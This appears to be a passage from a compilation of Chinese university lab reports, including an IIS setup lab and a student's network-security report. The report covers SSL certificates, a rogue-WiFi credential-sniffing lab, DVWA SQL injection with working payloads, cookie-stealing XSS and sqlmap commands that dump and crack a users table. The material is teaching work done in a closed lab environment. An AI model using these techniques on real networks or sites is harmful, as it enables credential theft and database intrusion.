“FTP站點(diǎn) 屬性”包含“安全帳戶(hù)”、“消息”、“主目錄”這些選項(xiàng)卡。其中，“安全賬戶(hù)”選項(xiàng)卡用于設(shè)置對(duì)訪(fǎng)問(wèn)用戶(hù)的驗(yàn)證方式；“消息”選 項(xiàng)卡用于設(shè)置用戶(hù)登錄及退出時(shí)，系統(tǒng)的提示信息；“主目錄”選項(xiàng)卡用 于設(shè)置 FTP站點(diǎn)的內(nèi)容放置的具體位置，以及用戶(hù)的訪(fǎng)問(wèn)權(quán)限。3.IIS之

Mail服務(wù)器

IIS的Mail服務(wù)也可以在“Internet信息服務(wù)”控制臺(tái)中可以找到，缺省 為“默認(rèn) SMTP 虛擬服務(wù)器”。通過(guò)右擊選擇屬性，可以設(shè)置 SMTP 服 務(wù)的相關(guān)參數(shù)，如圖 5-7。圖 4‐ 7虛擬服務(wù)器屬性設(shè)置

“默認(rèn) SMTP虛擬服務(wù)器 屬性”包含“常規(guī)”、“訪(fǎng)問(wèn)”、“郵件”、“傳 遞”、“LDAP路由”、“安全”這些選項(xiàng)卡。

其中，“常規(guī)”選項(xiàng)卡用于設(shè)置 IP地址和連接限制，以及日志記錄；“訪(fǎng) 問(wèn)”選項(xiàng)卡用于設(shè)置訪(fǎng)問(wèn)控制、安全通訊等參數(shù)；“郵件”選項(xiàng)卡用于指 定消息信息、設(shè)置未傳遞報(bào)告和死信目錄；“傳遞”選項(xiàng)卡用于設(shè)置出站 和本地的時(shí)間信息；“LDAP路由”用于設(shè)置是否啟用

LDAP路由以及相 應(yīng)的一些參數(shù)；“安全”選項(xiàng)卡用于設(shè)置訪(fǎng)問(wèn)用戶(hù)的權(quán)限。

四、實(shí)驗(yàn)組織運(yùn)行要求

7．學(xué)生在實(shí)驗(yàn)前，請(qǐng)先對(duì)Windows IIS的安裝和簡(jiǎn)單設(shè)置進(jìn)行熟悉。

8．學(xué)生在實(shí)驗(yàn)過(guò)程中，記錄相應(yīng)的服務(wù)設(shè)置信息，以及訪(fǎng)問(wèn)這些服務(wù)時(shí)的 狀況。

五、實(shí)驗(yàn)條件

1.提供安裝了 Windows操作系統(tǒng)的計(jì)算機(jī) 2.網(wǎng)絡(luò)環(huán)境

六、實(shí)驗(yàn)步驟

1.從網(wǎng)絡(luò)上下載、或預(yù)先自己設(shè)計(jì)一個(gè)網(wǎng)站，將它部署到 IIS Web服務(wù)器。在其它計(jì)算機(jī)上打開(kāi)瀏覽器，瀏覽部署的網(wǎng)站。

2.運(yùn)行 IIS的FTP功能，并在FTP服務(wù)器的目錄下放置一些共享文件。在 其它計(jì)算機(jī)上訪(fǎng)問(wèn)該 FTP服務(wù)器，注意登錄的用戶(hù)可以使用

anonymous 帳戶(hù)，該用戶(hù)不需要輸入密碼。

3.運(yùn)行 IIS的Mail服務(wù)，并且在服務(wù)所在的計(jì)算機(jī)上再單獨(dú)運(yùn)行一個(gè)

Mail 服務(wù)器。在其它計(jì)算機(jī)上訪(fǎng)問(wèn)該 Mail服務(wù)。

七、思考題

1.IIS Web服務(wù)中的虛擬目錄具有什么作用？

答：兩個(gè)不同文件夾下的文件之間可以互相調(diào)用 C:web和D:web1都是虛擬目錄 比如C:webindex.asp可以調(diào)用D:web1下的文件

2.為什么要在 IIS Mail服務(wù)所在的計(jì)算機(jī)上，另外再單獨(dú)運(yùn)行一個(gè)Mail服務(wù)器？

答:一般的情況下，一臺(tái)服務(wù)器是可以同時(shí)多程序在運(yùn)行的。郵件服務(wù)器也是在一般的服務(wù)器上利用軟件搭建出來(lái)的一種服務(wù)，IIS同樣是服務(wù)器和一種服務(wù)，所以二都是沒(méi)有沖突的。郵件服務(wù)器一樣可以提供IIS的功能。

四個(gè)實(shí)驗(yàn)：

第四篇：中國(guó)計(jì)量大學(xué)實(shí)驗(yàn)報(bào)告,

中 國(guó) 計(jì) 量 大 學(xué)

實(shí) 驗(yàn) 報(bào) 告

實(shí)驗(yàn)課程：

實(shí)驗(yàn)名稱(chēng)：

班

級(jí)：

學(xué)

號(hào)：

姓

名：

實(shí)驗(yàn)日期：

_______________________________________________________ 一、實(shí)驗(yàn)原理與實(shí)驗(yàn)內(nèi)容

二、實(shí)驗(yàn)儀器

三、實(shí)驗(yàn)數(shù)據(jù)記錄

實(shí)驗(yàn)預(yù)習(xí)及實(shí)際操作成績(jī)：

_________

教師簽名：

__________

四、實(shí)驗(yàn)數(shù)據(jù)分析及結(jié)論

五、思考題（要抄題目）

第五篇：中南大學(xué)網(wǎng)絡(luò)安全實(shí)驗(yàn)報(bào)告

學(xué)生姓名指導(dǎo)教師學(xué) 院專(zhuān)業(yè)班級(jí)學(xué) 號(hào)完成時(shí)間中南大學(xué)

網(wǎng)絡(luò)安全 實(shí)驗(yàn)報(bào)告

代巍 張士庚 信息科學(xué)與工程學(xué)院 信安1201班 0909121615 年1２月１５日

2014

目錄

實(shí)驗(yàn)一 CA證書(shū)與SSL連接 實(shí)驗(yàn)二 WIFI釣魚(yú) 實(shí)驗(yàn)三 SQL注入攻擊

實(shí)驗(yàn)四 配置和管理主機(jī)防火墻

實(shí)驗(yàn)一 CA證書(shū)與SSL連接

一．實(shí)驗(yàn)?zāi)康?/p>

通過(guò)申請(qǐng)、安裝數(shù)字證書(shū)，掌握使用SSL建立安全通信通道的方法。掌握在Windows Server 2003 下獨(dú)立根CA 的安裝和使用。使用WEB 方式申請(qǐng)證書(shū)和安裝證書(shū)。建立SSL 網(wǎng)站。

分析SSL 網(wǎng)站的數(shù)據(jù)包特點(diǎn)。二．實(shí)驗(yàn)原理

SSL協(xié)議的工作原理、數(shù)字證書(shū)的原理

在訪(fǎng)問(wèn)Web 站點(diǎn)時(shí)，如果沒(méi)有較強(qiáng)的安全措施，用戶(hù)訪(fǎng)問(wèn)的數(shù)據(jù)是可以使用網(wǎng)絡(luò)工具 捕獲并分析出來(lái)的。在Web 站點(diǎn)的身份驗(yàn)證中，有一種基本身份驗(yàn)證，要求用戶(hù)訪(fǎng)問(wèn)輸入

用戶(hù)名和密碼時(shí)，是以明文形式發(fā)送密碼的，蓄意破壞安全性的人可以使用協(xié)議分析程序破

譯出用戶(hù)名和密碼。那我們?cè)撊绻苊饽?？可利用SSL 通信協(xié)議，在Web 服務(wù)器上啟用安

全通道以實(shí)現(xiàn)高安全性。

SSL 協(xié)議位于TCP/IP 協(xié)議與各種應(yīng)用層協(xié)議之間，為數(shù)據(jù)通訊提供安全支持。SSL 協(xié) 議可分為兩層： SSL 記錄協(xié)議（SSL Record Protocol）：它建立在可靠的傳輸協(xié)議（如TCP）

之上，為高層協(xié)議提供數(shù)據(jù)封裝、壓縮、加密等基本功能的支持。SSL 握手協(xié)議（SSL Handshake Protocol）：它建立在SSL 記錄協(xié)議之上，用于在實(shí)際的數(shù)據(jù)傳輸開(kāi)始前，通訊雙

方進(jìn)行身份認(rèn)證、協(xié)商加密算法、交換加密密鑰等。每一個(gè)Windows Server 2003 證書(shū)頒發(fā)

機(jī)構(gòu)都有可供用戶(hù)和管理員使用的網(wǎng)頁(yè)。三．實(shí)驗(yàn)環(huán)境

虛擬機(jī)：Windows Server 2003，Windows XP，Wireshark 抓包軟件。四．實(shí)驗(yàn)過(guò)程

任務(wù)一：windows server 2003 環(huán)境下獨(dú)立根CA 的安裝及使用

1、windows server 2003 環(huán)境下獨(dú)立根CA 的安裝及使用，啟動(dòng)Windows Server 2003 和Windows XP，配臵其IP，使其在同一局域網(wǎng)網(wǎng)段。在Windows Server 2003 中，選擇【開(kāi)始】|【控制面板】|【添加和刪除程序】，在彈出窗口中選擇【添加和刪除windows 組件】，在【組件】列表框中選擇【證書(shū)服務(wù)】，再單擊【下一步】按鈕，如下圖所示。

2、在彈出的窗口中選擇【獨(dú)立根CA】單選按鈕，單擊【下一步】按鈕，在彈出窗口中按要求依次填入CA 所要求的信息，單擊【下一步】按鈕，如下圖所示。

3、繼續(xù)選擇【證書(shū)數(shù)據(jù)庫(kù)】、【數(shù)據(jù)庫(kù)日志】和配臵信息的安裝、存放路徑，如下圖所示，單擊【下一步】按鈕。安裝的時(shí)候，可能會(huì)彈出如下窗口，為了實(shí)驗(yàn)方便，已經(jīng)把I386 文件夾復(fù)制到C:下，選擇【瀏覽】，選擇文件夾“C:I386”，點(diǎn)【確定】，完成安裝。

4、選擇【開(kāi)始】|【程序】|【管理工具】，可以找到【證書(shū)頒發(fā)機(jī)構(gòu)】，說(shuō)明CA 的安裝已經(jīng)完成，如下圖所示。

5、從同一局域網(wǎng)中的另外一臺(tái)XP 開(kāi)啟IE 瀏覽器，輸入http://windows2003 的IP/certsrv/,選中【申請(qǐng)一個(gè)證書(shū)】，如下圖所示，在彈出的頁(yè)面中選擇【web 瀏覽器證書(shū)】。

6、在彈出窗口中填寫(xiě)用戶(hù)的身份信息，完成后進(jìn)行【提交】。此種情況下，IE 瀏覽器采用

默認(rèn)的加密算法生成公鑰對(duì)，私鑰保存在本地計(jì)算機(jī)中，公鑰和用戶(hù)身份信息按照標(biāo)準(zhǔn)的格式發(fā)給CA 服務(wù)器，如圖所示,單擊【是】，進(jìn)入下一步。CA 服務(wù)器響應(yīng)后，彈出證書(shū)申請(qǐng)成功頁(yè)面，如下圖所示。

7、在根CA 所在的計(jì)算機(jī)上，選擇【開(kāi)始】|【程序】|【管理工具】|【證書(shū)頒發(fā)機(jī)構(gòu)】，上面申請(qǐng)的證書(shū)便會(huì)出現(xiàn)在窗口右邊，選擇證書(shū)單擊右鍵，選擇【所有任務(wù)】|【頒發(fā)】，進(jìn)行證書(shū)頒發(fā)，如下圖所示。證書(shū)頒發(fā)后將從【掛起的申請(qǐng)】文件夾轉(zhuǎn)入【頒發(fā)的證書(shū)】文件夾中，表示證書(shū)頒發(fā)完成。

8、在申請(qǐng)證書(shū)的計(jì)算機(jī)上打開(kāi)IE，輸入http://windows2003 的IP/certsrv/，進(jìn)入證書(shū)申請(qǐng)頁(yè)面，選擇【查看掛起的證書(shū)申請(qǐng)狀態(tài)】，彈出的頁(yè)面中選擇一個(gè)已經(jīng)提交的證書(shū)申請(qǐng)，如下圖所示。選擇安裝此證書(shū)。

9、現(xiàn)在驗(yàn)證此CA 系統(tǒng)頒發(fā)的新證書(shū)是否可信，為此需要安裝CA 系統(tǒng)的根證書(shū)，進(jìn)入證書(shū)申請(qǐng)主頁(yè)面，選擇當(dāng)前的CA 證書(shū)進(jìn)行下載，并保存到合適路徑，如下圖所示。

10、下載完畢之后，在證書(shū)的保存目錄中查看證書(shū)信息，單擊【安裝證書(shū)】按鈕，進(jìn)入證書(shū)導(dǎo)入向?qū)?，按照默認(rèn)的配臵完成證書(shū)的導(dǎo)入，導(dǎo)入成功后，單擊【確定】按鈕，之后完成。

任務(wù)二：基于Web的SSL連接設(shè)臵

1、在XP 中，左下角【開(kāi)始】，打開(kāi)【W(wǎng)ireshark】，并點(diǎn)擊開(kāi)始抓包的按鈕。打開(kāi)IE 瀏覽器，輸入網(wǎng)址http://windows2003 的IP/?id=1(比如：http://192.168.1.130/?id=1)，然后保存Wireshark的抓包結(jié)果1。

2、選擇【開(kāi)始】|【程序】|【管理工具】|【IIS（Internet 信息服務(wù)）管理器】，在彈出窗口右鍵單擊【默認(rèn)網(wǎng)站】，彈出的快捷菜單中選擇【屬性】選項(xiàng)。

3、在彈出窗口內(nèi)選擇【目錄安全性】標(biāo)簽，單擊【安全通信】中的【服務(wù)器證書(shū)】按鈕，如下圖所示。

4、彈出【IIS 證書(shū)向?qū)А看翱?，選中【新建證書(shū)】復(fù)選項(xiàng)，一直單擊【下一步】按鈕，輸入自定義的名稱(chēng)，如下圖所示。填寫(xiě)相應(yīng)的信息后，單擊【下一步】按鈕。

5、彈出【請(qǐng)求文件摘要】窗口，確認(rèn)后單擊【下一步】按鈕，接著單擊【完成】按鈕，完成服務(wù)器端證書(shū)配臵，如下圖所示

6、打開(kāi)IE 瀏覽器（windows2003 中的），進(jìn)入證書(shū)申請(qǐng)主界面，如下圖所示。

7、在出現(xiàn)的網(wǎng)頁(yè)中選擇【高級(jí)證書(shū)申請(qǐng)】，如圖所示，在出現(xiàn)的網(wǎng)頁(yè)中單擊第二個(gè)選項(xiàng)【base64編碼】。打開(kāi)剛才IIS 證書(shū)向?qū)傻恼?qǐng)求文件，（默認(rèn)路徑C:certreq.txt），復(fù)制并粘貼文件內(nèi)容到第一個(gè)文本框，如下圖所示，單擊【提交】按鈕，轉(zhuǎn)到完成提交后的頁(yè)面。

8、回到首頁(yè)，選擇【查看掛起的證書(shū)申請(qǐng)狀態(tài)】，彈出的頁(yè)面中選擇一個(gè)已經(jīng)提交的證書(shū)申請(qǐng)，如下圖所示。選擇【Base 64 編碼】，點(diǎn)擊【下載證書(shū)】，【保存】certnew.cer 文件到桌面。

9、選擇【開(kāi)始】|【程序】|【管理工具】|【IIS（Internet 信息服務(wù)）管理器】，在彈出窗口右鍵單擊【默認(rèn)網(wǎng)站】，彈出的快捷菜單中選擇【屬性】選項(xiàng)，在彈出窗口內(nèi)選擇【目錄安全性】標(biāo)簽，選擇【服務(wù)器證書(shū)】，選擇【下一步】，【處理掛起的請(qǐng)求并安裝證書(shū)】選擇【下一步】，【瀏覽】選擇剛才保存的certnew.cer 文件，如下圖所示?！鞠乱徊健俊鞠乱徊健俊就瓿伞?。

10、還是在【目錄安全性】下，選擇【安全通信】下的【編輯】，在下如圖所示的彈出窗口中選中【要求安全通道（SSL）】復(fù)選項(xiàng)，并在【客戶(hù)端證書(shū)】欄中選中【接受客戶(hù)端證書(shū)】復(fù)選項(xiàng)，再單擊【確定】按鈕。返回【目錄安全性】面板，單擊【應(yīng)用】按鈕及【確定】按鈕，完成配臵。

11、在XP 系統(tǒng)打開(kāi)瀏覽器，輸入服務(wù)器IP 地址，進(jìn)入證書(shū)申請(qǐng)主頁(yè)面，此時(shí)會(huì)顯示錯(cuò)誤信息頁(yè)面，要求采用https 的方式連接服務(wù)器，如圖所示。

12、把http 改成https 繼續(xù)訪(fǎng)問(wèn)，此時(shí)瀏覽器提示你要安裝證書(shū)，安裝完證書(shū)后，就可以正常使用了。、再次打開(kāi)Wireshark，并點(diǎn)擊開(kāi)始抓包的按鈕。打開(kāi)IE 瀏覽器，輸入網(wǎng)址https://windows2003 的IP/?id=1(比如：https://192.168.1.130/?id=1)，然后保存Wireshark 的抓包結(jié)果2。

14、分析比較抓包結(jié)果1 和抓包結(jié)果2 中，對(duì)IP/?id=1 請(qǐng)求處理的差異。

五、實(shí)驗(yàn)感想

至此，我完成了整個(gè)數(shù)字證書(shū)的安裝和使用實(shí)驗(yàn)。通過(guò)本次實(shí)驗(yàn)我學(xué)會(huì)了SSL協(xié)議的工作原理，同時(shí)了解到了CA證書(shū)的頒發(fā)機(jī)制。

任何一個(gè)安全性系統(tǒng)整體性設(shè)計(jì)，都離不開(kāi)數(shù)字證書(shū)的加密，可以想象加密機(jī)制對(duì)信息安全的重要性。

需要說(shuō)明的是，盡管SSL能提供實(shí)際不可破譯的加密功能，但是SSL安全機(jī)制的實(shí)現(xiàn)會(huì)大大增加系統(tǒng)的開(kāi)銷(xiāo)，增加了服務(wù)器CPU的額外負(fù)擔(dān)，使得SSL加密傳輸?shù)乃俣却蟠蟮陀诜羌用軅鬏數(shù)乃俣?。因此，為了防止整個(gè)Web網(wǎng)站的性能下降，可以考慮只把SSL安全機(jī)制用來(lái)處理高度機(jī)密的信息，例如提交包含信用卡信息的表格。

實(shí)驗(yàn)二 WIFI釣魚(yú)

一．實(shí)驗(yàn)?zāi)康?/p>

1、通過(guò)實(shí)際測(cè)試，模擬入侵者利用wifi抓包來(lái)竊取用戶(hù)數(shù)據(jù)的過(guò)程。掌握整個(gè)過(guò)程中的原理，數(shù)據(jù)分析等。

2、掌握抓包軟件的使用。二．實(shí)驗(yàn)原理

在一個(gè)可控的網(wǎng)絡(luò)環(huán)境里，劫持?jǐn)?shù)據(jù)有很多方法。比較有名的網(wǎng)絡(luò)層抓包工具有wireshark，tcpdump，都是很好的網(wǎng)絡(luò)協(xié)議分析工具。我們現(xiàn)在手機(jī)上的大多數(shù)APP應(yīng)用層都是使用的HTTP協(xié)議，因此我們很多的在web安全測(cè)試?yán)锩嬗玫降姆治龉ぞ呷鏵iddler，burp，httpanalyzer，Charles等也都是可以用來(lái)分析或者劫持APP的通信流。

用戶(hù)手機(jī)里的app默認(rèn)會(huì)進(jìn)行很多敏感的請(qǐng)求，手機(jī)會(huì)自動(dòng)去登陸和獲取最新的信號(hào)；如果手機(jī)默認(rèn)會(huì)鏈接周?chē)呀?jīng)被保存sid的wifi；通過(guò)內(nèi)臵最常見(jiàn)的sid和信息，入侵者可以使得周?chē)娜藭?huì)自動(dòng)鏈接上入侵者假設(shè)好的wifi，通過(guò)抓取相應(yīng)的數(shù)據(jù)取得里面的敏感信息，理論上是可以劫持用戶(hù)的相關(guān)密碼信息的。三．實(shí)驗(yàn)環(huán)境

帶有無(wú)線(xiàn)網(wǎng)卡的筆記本電腦，Wireshark 抓包軟件，智能手機(jī)。四．實(shí)驗(yàn)過(guò)程 步驟一共享WIFI 工具：電腦、WIN7 系統(tǒng)、無(wú)線(xiàn)網(wǎng)卡 步驟

1.開(kāi)始菜單-->命令提示符(cmd)-->右鍵，以管理員身份運(yùn)行

2.運(yùn)行以下命令啟用虛擬網(wǎng)卡>netsh wlan set hostednetwork mode=allow ssid=(這里寫(xiě)無(wú)線(xiàn)網(wǎng)名字)key=(這里是密碼)

3.網(wǎng)絡(luò)共享中心-->更改高級(jí)適配器設(shè)臵-->右鍵已連接到Internet 的網(wǎng)絡(luò)連接-->屬性-->切換

到“共享”選項(xiàng)卡，選中其中的復(fù)選框，并選擇允許其共享Internet 的網(wǎng)絡(luò)連接，這里即我們的虛擬WIFI 網(wǎng)卡

4.開(kāi)啟無(wú)線(xiàn)網(wǎng)絡(luò)，繼續(xù)在命令提示符中運(yùn)行以下命令:>netsh wlan start hostednetwork即可開(kāi)啟我們之前設(shè)臵好的無(wú)線(xiàn)網(wǎng)絡(luò)（相當(dāng)于打開(kāi)路由器的無(wú)線(xiàn)功能）

步驟二WIFI 釣魚(yú)工具：其他筆記本或手機(jī)、Wareshark 步驟

1.搜索到剛剛設(shè)臵的WIFI：dave，連接上（密碼為剛剛設(shè)臵的key:12345678）2.在筆記本上打開(kāi)wareshark，選擇capture-->interfaces

3.選擇Packets 最多的項(xiàng)，點(diǎn)擊start 按鈕

4.在手機(jī)或筆記本上打開(kāi)中南大學(xué)郵箱網(wǎng)站:http://mail.csu.edu.cn/,在主機(jī)上用wareshark 捕捉http 的包（這里大家可以自由實(shí)驗(yàn)，能監(jiān)控到連接到該WIFI 的機(jī)器的所有包的情況）

5.在手機(jī)或筆記本上輸入用戶(hù)名和密碼，點(diǎn)擊登錄

6.在主機(jī)上用wareshark 捕捉到剛剛post 提交的http 包，右鍵選擇Follow tcp stream

7.可以看到剛剛提交的用戶(hù)名和密碼，且是未經(jīng)過(guò)加密的

五、實(shí)驗(yàn)感想

通過(guò)這次實(shí)驗(yàn)，我實(shí)際地模擬了一次入侵者通過(guò)假設(shè)釣魚(yú)WIFI網(wǎng)絡(luò)，來(lái)竊取連接此網(wǎng)絡(luò)的用戶(hù)的密碼信息過(guò)程。整個(gè)過(guò)程中我成功地完成了對(duì)各種用戶(hù)數(shù)據(jù)抓包，并分析出用戶(hù)密碼。

這讓我對(duì)wifi網(wǎng)絡(luò)產(chǎn)生了新的看法，我意識(shí)到了鏈接wifi網(wǎng)絡(luò)過(guò)程當(dāng)中存在很多安全隱患，如果被圖謀不軌的人利用到，一旦泄露商業(yè)機(jī)密等重要信息，勢(shì)必會(huì)產(chǎn)生重大的經(jīng)濟(jì)損失。

隨著人們的生活越來(lái)越離不開(kāi)網(wǎng)絡(luò)，也越來(lái)越離不開(kāi)移動(dòng)手機(jī)，一般的公共廠商都已經(jīng)將wifi作為基礎(chǔ)服務(wù)進(jìn)行提供，譬如在星巴克、麥當(dāng)勞等公共場(chǎng)所邊點(diǎn)杯熱飲邊“蹭網(wǎng)”，已經(jīng)是一個(gè)基本的習(xí)慣了，甚至一些大型的電信提供商已經(jīng)嘗試將wifi作為一個(gè)基礎(chǔ)的接入。如今公共的wifi很多，尤其是免費(fèi)的，手機(jī)上還有幫助尋找免費(fèi)wifi的各類(lèi)app。很多人為了省流量，看到免費(fèi)的wifi，總會(huì)去連接一下嘗試網(wǎng)上沖浪。不過(guò)，在這些免費(fèi)的wifi以及大家使用wifi的習(xí)慣，加上手機(jī)及app的默認(rèn)行為，就可以導(dǎo)致一些嚴(yán)重安全問(wèn)題。

實(shí)驗(yàn)三 SQL注入攻擊

一．實(shí)驗(yàn)?zāi)康?/p>

是了解sql注入攻擊的原理，掌握網(wǎng)站的工作機(jī)制，認(rèn)識(shí)到SQL注入攻擊的防范措施，加強(qiáng)對(duì)Web攻擊的防范。

二．實(shí)驗(yàn)原理

SQL注入攻擊指的是通過(guò)構(gòu)建特殊的輸入作為參數(shù)傳入Web應(yīng)用程序，而這些輸入大都是SQL語(yǔ)法里的一些組合，通過(guò)執(zhí)行SQL語(yǔ)句進(jìn)而執(zhí)行攻擊者所要的操作，其主要原因是程序沒(méi)有細(xì)致地過(guò)濾用戶(hù)輸入的數(shù)據(jù)，致使非法數(shù)據(jù)侵入系統(tǒng)。

根據(jù)相關(guān)技術(shù)原理，SQL注入可以分為平臺(tái)層注入和代碼層注入。前者由不安全的數(shù)據(jù)庫(kù)配臵或數(shù)據(jù)庫(kù)平臺(tái)的漏洞所致；后者主要是由于程序員對(duì)輸入未進(jìn)行細(xì)致地過(guò)濾，從而執(zhí)行了非法的數(shù)據(jù)查詢(xún)。

三．實(shí)驗(yàn)環(huán)境

虛擬機(jī)WindowsXP系統(tǒng)、Windows2003系統(tǒng)。dvwa(Dam Vulnerable Web Application)工具，sqlmap SQL注入工具、四．實(shí)驗(yàn)過(guò)程

【實(shí)驗(yàn)一：dvwa手動(dòng)sql注入】

1、連接好虛擬機(jī)拓?fù)鋱D，配臵WindowsXP Client和Windows XP Server的IP使其在同一個(gè)局域網(wǎng)網(wǎng)段。

2、打開(kāi)Server端的xampp，啟動(dòng)apache和mysql。打開(kāi)Client的瀏覽器，訪(fǎng)問(wèn)Server的IP/dvwa，如“192.168.1.32/dvwa”，登陸賬戶(hù)為admin，密碼為password

3、選擇SQLInjection，點(diǎn)擊右下角的ViewSource，查看PHP源代碼。

4、正常測(cè)試，輸入“1”，得到正常結(jié)果，如下所示。

5、當(dāng)將輸入變?yōu)椤?”時(shí)，頁(yè)面提示錯(cuò)“YouhaveanerrorinyourSQLsyntax;checkthemanualthatcorrespondstoyourMySQLserverversionfortherightsyntaxtousenear'''''atline1”，結(jié)果如圖?？吹竭@個(gè)結(jié)果，可以知道，這個(gè)表單存在著注入漏洞。

6、嘗試輸入：“1’or 1=1–”注意“--”后面有空格！此時(shí)成功進(jìn)行sql注入。

7、測(cè)試查詢(xún)信息列數(shù)。利用語(yǔ)句order by num。這里輸入“ 1'order by 1--” 結(jié)果頁(yè)面正常顯示，注意--后面有空格。繼續(xù)測(cè)試，“ 1'order by 2--”,“ 1'order by 3--”，當(dāng)輸入3是，頁(yè)面報(bào)錯(cuò)。頁(yè)面錯(cuò)誤信息如下，Unknown column '3' in 'order clause'，由此查詢(xún)結(jié)果值為2列。

8、嘗試注入“1' and 1=2 union select 1,2--”，從而得出First name處顯示結(jié)果為查詢(xún)結(jié)果第一列的值，surname處顯示結(jié)果為查詢(xún)結(jié)果第二列的值，利用內(nèi)臵函數(shù)user(),及database()，version()注入得出連接數(shù)據(jù)庫(kù)用戶(hù)以及數(shù)據(jù)庫(kù)名稱(chēng)：“1' and 1=2 union select user(),database()--”。

9、選擇DVWA Security，將安全級(jí)別分別設(shè)臵為中、高。再運(yùn)行上面的實(shí)驗(yàn)sql語(yǔ)句，結(jié)合右下角的ViewSource，分析三種等級(jí)的代碼和sql注入效果有何區(qū)別。在安全級(jí)別分別設(shè)臵為低時(shí)，結(jié)合PHP源代碼，考慮不采用“--”的情形下，完成sql注入，寫(xiě)出sql注入語(yǔ)句。

【實(shí)驗(yàn)二：sqlmap測(cè)試dvwa】

1、打開(kāi)Server端的xampp，啟動(dòng)apache和mysql。打開(kāi)Client的瀏覽器，訪(fǎng)問(wèn)Server的IP/dvwa，如“192.168.1.32/dvwa”，登陸賬戶(hù)為admin，密碼為password。選擇DVWA Security，將安全級(jí)別分別設(shè)臵為低。

2、選擇XSS reflected，輸入“alert(document.cookie)”，獲取登陸系統(tǒng)后的cookie值，截圖保存cookie值。

3、使用sqlmap查找注入點(diǎn)，打開(kāi)Client端的控制臺(tái)窗口，轉(zhuǎn)到目錄“C:Python27sqlmap”，輸入以下命令，注意！“192.168.1.32”表示Server的IP，“security=low;PHPSESSID=tvitu9mog097jl4ctfsqhbs9o6”表示上一步所獲得的cookie值，請(qǐng)同學(xué)們按照實(shí)際環(huán)境填寫(xiě)相應(yīng)的值！“sqlmap.py-u http://192.168.1.32/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit--cookie=“security=low;PHPSESSID=tvitu9mog097jl4ctfsqhbs9o6””。

依據(jù)以下信息，得到可能的注入點(diǎn)是id，數(shù)據(jù)庫(kù)是mysql。

[INFO] heuristic(basic)test shows that GET parameter 'id' might be injectable(possible DBMS: 'MySQL')

[INFO] GET parameter 'id' is 'MySQL UNION query(NULL)-1 to 20 columns' injectable

4、輸入“sqlmap.py-u “http://192.168.1.32/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit”--cookie=“security=low;PHPSESSID=tvitu9mog097jl4ctfsqhbs9o6”--current-db”得到當(dāng)前數(shù)據(jù)庫(kù)名。

current database: 'dvwa'

5、輸入“sqlmap.py-u “http://192.168.1.32/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit”--cookie=“security=low;PHPSESSID=tvitu9mog097jl4ctfsqhbs9o6”--current-db--tables-Ddvwa”得到數(shù)據(jù)庫(kù)所有表。

6、輸入“sqlmap.py-u “http://192.168.1.32/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit”--cookie=“security=low;PHPSESSID=tvitu9mog097jl4ctfsqhbs9o6”-T users--columns”得到user表的所有列。

7、輸入“sqlmap.py-u “http://192.168.1.32/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit”--cookie=“security=low;PHPSESSID=tvitu9mog097jl4ctfsqhbs9o6”-T users--dump”得到user表的所有列，在sqlmap詢(xún)問(wèn)時(shí)候破解密碼時(shí)，選擇是，sqlmap會(huì)使用自己的字典來(lái)破解密碼，得到5個(gè)用戶(hù)的密碼。此時(shí)就完成了利用sqlmap進(jìn)行“拖庫(kù)”的基本步驟。五．實(shí)驗(yàn)感想

通過(guò)實(shí)驗(yàn)，我明白了帶有參數(shù)的動(dòng)態(tài)網(wǎng)頁(yè)，很多都是沒(méi)有進(jìn)行過(guò)濾的。如果能夠被SQL注入工具，就存在安全隱患，有可能就因?yàn)檫@個(gè)漏洞，入侵者就可以得到登錄權(quán)限并控制整個(gè)服務(wù)器。

從實(shí)驗(yàn)可以看出，只要是帶有參數(shù)的動(dòng)態(tài)網(wǎng)頁(yè)，且此網(wǎng)頁(yè)訪(fǎng)問(wèn)了數(shù)據(jù)庫(kù)，就有可能存在SQL注入攻擊，因此SQL注入攻擊潛在的發(fā)生概率相對(duì)于其他Web攻擊要高很多，危害面也更廣。其主要危害包括：獲取系統(tǒng)控制權(quán)、未經(jīng)授權(quán)狀況下操作數(shù)據(jù)庫(kù)的數(shù)據(jù)、惡意篡改網(wǎng)頁(yè)內(nèi)容、私自添加系統(tǒng)帳號(hào)或數(shù)據(jù)庫(kù)使用者帳號(hào)等。

目前基于數(shù)據(jù)庫(kù)的網(wǎng)絡(luò)應(yīng)用越來(lái)越多。與此同時(shí)，用于搜索SQL注入點(diǎn)的軟件在網(wǎng)絡(luò)上隨處可見(jiàn)，攻擊者只需要具備少量的專(zhuān)業(yè)知識(shí)就可以利用這些軟件尋找目標(biāo)進(jìn)行攻擊。攻擊目標(biāo)和攻擊者的增加使得SQL注入攻擊在近幾年出現(xiàn)擴(kuò)大的趨勢(shì)

為了防止SQL注入帶來(lái)的危害，在網(wǎng)站開(kāi)發(fā)的過(guò)程中，需要對(duì)需要輸入?yún)?shù)的模塊進(jìn)行過(guò)濾，并加入相關(guān)權(quán)限認(rèn)證模塊。

實(shí)驗(yàn)四 配置和管理主機(jī)防火墻

一．實(shí)驗(yàn)?zāi)康?/p>

1.學(xué)習(xí)配臵和管理主機(jī)防火墻，介紹如何配臵linux 防火墻。2.掌握l(shuí)inux 下基本的iptables 知識(shí)，學(xué)會(huì)配臵iptables

二．實(shí)驗(yàn)原理

對(duì)于Internet 上的系統(tǒng)，不管是什么情況，首先我們要明確一點(diǎn)：網(wǎng)絡(luò)是不安全的。因此，雖然創(chuàng)建一個(gè)防火墻并不能保證系統(tǒng)100%安全，但卻是絕對(duì)必要的。和社會(huì)上其它任何事物一樣，Internet 經(jīng)常會(huì)受到一些無(wú)聊的或者別有用心的人的干擾，防火墻的目的就是將這類(lèi)人擋在你的網(wǎng)絡(luò)之外，同時(shí)使你仍然可以完成自己的工作。因?yàn)椴煌膽?yīng)用環(huán)境對(duì)安全的要求不一樣。用一句比較恰當(dāng)而且簡(jiǎn)單的話(huà)來(lái)回答這個(gè)問(wèn)題：用戶(hù)了解自己的Linux 